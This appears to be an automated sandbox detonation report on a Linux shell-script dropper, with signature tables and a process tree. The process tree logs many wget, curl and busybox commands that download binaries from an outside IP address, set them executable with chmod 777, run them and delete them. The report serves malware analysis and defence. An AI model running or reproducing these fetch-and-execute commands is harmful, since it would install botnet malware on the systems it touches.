| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 07:29
Reported
2024-11-21 07:31
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
11s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | N/A |
| N/A | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | N/A |
| N/A | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | N/A |
| N/A | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | N/A |
| N/A | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | N/A |
| N/A | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | N/A |
| N/A | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | N/A |
| N/A | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | N/A |
| N/A | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | N/A |
| N/A | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | N/A |
| N/A | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | N/A |
| N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | N/A |
| N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | N/A |
| N/A | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | N/A |
| N/A | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | N/A |
| N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | N/A |
| N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | N/A |
| N/A | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | N/A |
| N/A | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | N/A |
| N/A | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | N/A |
| N/A | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | N/A |
| N/A | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | N/A |
| N/A | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | N/A |
| N/A | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /usr/bin/curl | N/A |
Processes
/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh
[/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/chmod
[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/rm
[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/wget
[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/chmod
[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/rm
[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/wget
[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/chmod
[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/rm
[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/wget
[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/chmod
[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/rm
[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/wget
[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/chmod
[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/rm
[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/wget
[wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/chmod
[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/rm
[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/usr/bin/wget
[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/chmod
[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/rm
[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/wget
[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/chmod
[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/rm
[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/wget
[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/chmod
[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/rm
[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/wget
[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/chmod
[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/rm
[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/wget
[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/chmod
[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/rm
[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/wget
[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/chmod
[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/rm
[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/wget
[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/chmod
[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/rm
[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/wget
[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/chmod
[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/rm
[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/chmod
[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/rm
[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/wget
[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/chmod
[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/rm
[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/wget
[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/chmod
[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/rm
[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/wget
[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/chmod
[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/rm
[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/wget
[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/chmod
[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/rm
[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/wget
[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/chmod
[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/rm
[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/chmod
[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/rm
[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/wget
[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/chmod
[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/rm
[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/wget
[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/chmod
[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/rm
[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/wget
[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/chmod
[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/rm
[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/wget
[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/chmod
[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/rm
[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/wget
[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/chmod
[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
